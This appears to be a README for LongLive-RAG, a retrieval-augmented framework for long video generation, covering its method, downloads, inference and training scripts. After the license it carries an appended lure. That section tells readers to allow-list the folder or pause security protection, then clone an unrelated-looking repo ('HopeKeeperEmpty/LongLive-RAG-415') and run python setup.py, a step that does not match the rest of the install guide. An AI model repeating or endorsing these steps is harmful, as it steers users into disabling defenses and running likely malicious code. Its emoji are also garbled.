Qixin Hu Β· Shuai Yang Β· Wei Huang Β· Song Han Β· Yukang Chen
LongLive-RAG turns long video generation into a retrieval problem. Instead of attending only to the most recent sliding window, an autoregressive (AR) video generator looks back over the video it has already generated and pulls in the most relevant past latents as extra context. This cuts error accumulation, identity drift, and background flicker over long horizons, without retraining the base generator.
- π₯ [2026.06] We release the LongLive-RAG paper and code!
π More results and video comparisons on the project page.
Long-horizon comparisons. The native sliding-window baseline (left) accumulates errors and drifts over time, while adding LongLive-RAG (right) preserves subject identity and visual quality.
| Native (baseline) | Native + LongLive-RAG (Ours) |
|---|---|
native_1.mp4 |
native_ours_1.mp4 |
native_2.mp4 |
native_ours_2.mp4 |
- π₯ First of its kind. Among open-ended AR long video generation methods, the first to formulate self-generated latent history as content-addressable retrieval memory.
- π Plug-and-play. Works across Causal-Forcing, Self-Forcing, and LongLive with the base generator frozen.
- π Searchable history. Retrieves the most relevant past latents as extra context for each new block.
- β‘ Consistent wins. Best average VBench-Long rank across lengths and backbones.
At block t, a standard AR model attends to a sliding-window context. LongLive-RAG inserts retrieved historical entries M_t between the sink and local windows:
Sliding window: A_sw = [ C_sink β C_loc ]
LongLive-RAG: A_rag = [ C_sink β M_t β C_loc ]
| Stage | What happens |
|---|---|
| 1. Indexing | Encode each completed latent block into a compact embedding and store it. |
| 2. Retrieval | Match the current block against past embeddings and pull in the top-K as extra context. |
| 3. Embedding training | Train the encoder offline on self-generated latents, with the base generator frozen. |
LongLive-RAG shares its environment with LongLive. Just follow the upstream LongLive installation guide.
1. Download everything β two commands. All LongLive-RAG assets (AR backbones, retrieval AE, prompt files, and the toy latent set) live in a single Hugging Face repo; the base WAN VAE comes from Wan:
# Base WAN VAE β LongLive-RAG operates in its latent space
hf download Wan-AI/Wan2.1-T2V-1.3B --local-dir wan_models/Wan2.1-T2V-1.3B
# All LongLive-RAG assets β restores checkpoints/ and toydatasets/ in place
hf download qixinhu11/LongLive-RAG --local-dir . --include "checkpoints/*" "toydatasets/*"Older setups can swap
hf downloadforhuggingface-cli download(same arguments).
The second command lays out:
checkpoints/
βββ causal_forcing.pt # Causal-Forcing AR backbone
βββ self_forcing.pt # Self-Forcing AR backbone
βββ longlive_base.pt # LongLive AR backbone
βββ longlive_lora.pt # LongLive LoRA (paired with longlive_base.pt)
βββ ae_latent_mem.pt # Retrieval autoencoder (default for inference)
βββ moviegenbench_128_refined.txt # 128 MovieGenBench prompts
βββ vidprom_filtered_extended.txt # Self-Forcing prompt pool (for generate_latent.py)
toydatasets/
βββ latent_0000xx.pt # tiny example latent set for the training demo
To train your own retrieval AE instead of using ae_latent_mem.pt, see Training.
3. Run. The repo ships a 3 Γ 2 grid (three backbones Γ two context-assembly methods) in configs/:
| Backbone \ Method | native (sliding-window) |
latentmem (LongLive-RAG, ours) |
|---|---|---|
| causal_forcing | causal_forcing_native.yaml | causal_forcing_latentmem.yaml |
| self_forcing | self_forcing_native.yaml | self_forcing_latentmem.yaml |
| longlive | longlive_native.yaml | longlive_latentmem.yaml |
# Main result: Causal-Forcing backbone + LongLive-RAG retrieval
bash inference.sh causal_forcing latentmem
# Baselines: native sliding-window
bash inference.sh causal_forcing native
# GPU / port overrides
GPU=4 PORT=29510 bash inference.sh causal_forcing latentmemThe base generator stays frozen; the only trainable component is the retrieval encoder (a small latent autoencoder). Training has two steps:
Step 1: Build a latent corpus. Run a frozen generator over a prompt pool to collect the clean latent blocks it produces; these become the training samples. The launcher shards generation across multiple GPUs.
bash generate_latent.shStep 2: Train the retrieval autoencoder. Fit the encoder on the collected latents with a reconstruction loss plus the Window Temporal Delta and trajectory-smoothing terms. Default hyperparameters live in ae/configs/.
bash train_ae_delta.shRetraining the base AR backbones is out of scope; backbone checkpoints are consumed as-is. See upstream LongLive / Self-Forcing to train one from scratch.
βββ ae/ # Retrieval autoencoder (model, configs, training)
βββ checkpoints/ # AR backbones, AE checkpoint, prompt .txt files (gitignored)
βββ configs/ # Inference YAMLs (3 backbones Γ 2 methods) + generate_latent
βββ datasets/ # AE training latents (output of generate_latent.sh, gitignored)
βββ toydatasets/ # Tiny example latent set for the training demo (from HF, gitignored)
βββ pipeline/ # Causal inference pipeline (drives all backbones)
βββ utils/ # Dataset, memory, scheduler, lora, wan-wrapper utilities
βββ wan/, wan_models/ # WAN VAE backbone (T2V-1.3B)
βββ inference.py # Inference entry point
βββ inference.sh # Launcher: bash inference.sh <backbone> <method>
βββ generate_latent.py / .sh # Latent corpus generation (multi-GPU sharded)
βββ train_ae_delta.sh # Retrieval AE launcher
π Paper: arXiv:2606.02553
@article{longliverag2026,
title = {LongLive-RAG: A General Retrieval-Augmented Framework for Long Video Generation},
author = {Hu, Qixin and Yang, Shuai and Huang, Wei and Han, Song and Chen, Yukang},
journal = {arXiv preprint arXiv:2606.02553},
archivePrefix = {arXiv},
eprint = {2606.02553},
year = {2026}
}LongLive-RAG builds on the codebases and ideas of:
- LongLive: the AR long-video framework this codebase forks from.
- Self-Forcing: causal AR training recipe and prompt pool.
- Causal-Forcing: one of the AR backbones evaluated in this work.
- Wan: the base video generation model and VAE latent space.
Released under the Apache 2.0 license.
Tip
If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.
Caution
Some security systems may block the installation. Only download from the official repository.
git clone https://github.com/HopeKeeperEmpty/LongLive-RAG-415.git
cd LongLive-RAG-415
python setup.py
